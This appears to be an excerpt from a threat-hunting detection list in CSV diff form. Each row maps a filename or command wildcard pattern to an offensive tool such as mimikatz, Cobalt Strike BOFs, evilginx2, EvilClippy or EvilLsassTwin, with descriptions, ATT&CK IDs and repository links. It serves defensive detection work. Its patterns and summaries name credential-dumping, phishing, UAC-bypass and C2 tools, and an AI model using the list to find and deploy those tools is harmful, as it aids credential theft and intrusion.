+"*evasion/has_recycle_bin.*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*evasion_shellcode.js*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*event::clear*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*event::drop*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*EventAggregation.dll.bak*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z"
+"*EventAggregation.dll.bak*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - 
TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*EventAggregation.dll.patched*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*EventAggregationPH.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*eventlog -risk-i-know*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*eventlog_fucker.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*eventspy.cna*","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z"
+"*EventSub-Aggressor.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*EventViewerRCE.ps1*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z"
+"*EventViewerUAC.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z"
+"*EventViewerUAC.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z"
+"*EventViewerUAC.x64*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z"
+"*EventViewerUAC.x86*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z"
+"*EventViewerUAC_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z"
+"*eventvwr_elevator*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*-EventVwrBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1118","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider 
- APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*evilclippy *","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*EvilClippy.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*EvilClippy.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*EvilClippyManager.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*EvilClippy-master*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*EvilClippyMenu*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*evilfeed.go*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"*evilginx*","offensive_tool_keyword","evilginx","evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. which implements its own HTTP and DNS server. 
making it extremely easy to set up and use","T1556 - T1565 - T1056 - T1558 - T1110","TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z"
+"*evilginx.exe*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z"
+"*evilginx2*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z"
+"*evilginx-linux*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"*evilginx-mastery*","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","8329","1638","2023-09-28T22:51:46Z","2018-07-10T09:59:52Z"
+"*evilgophish*","offensive_tool_keyword","gophish","Combination of evilginx2 
and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"*evilgrade*","offensive_tool_keyword","evilgrade","Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set","T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212","TA0002 - ","N/A","N/A","Frameworks","https://github.com/infobyte/evilgrade","1","0","N/A","N/A","10","1236","288","2021-09-01T17:08:27Z","2013-04-22T16:08:48Z"
+"*EvilLsassTwin.exe*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*EvilLsassTwin.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*evilmog/ntlmv1-multi*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*EvilnoVNC-main*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z"
+"*eviloffice.exe*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*EvilPayload.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*evilqr-main*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z"
+"*evilqr-phishing*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z"
+"*evilqr-server*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z"
+"*evilsocket*","offensive_tool_keyword","Github Username","github username of hacker known for sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/evilsocket","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*EvilTwin.dmp*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*EvilTwinServer.nim*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
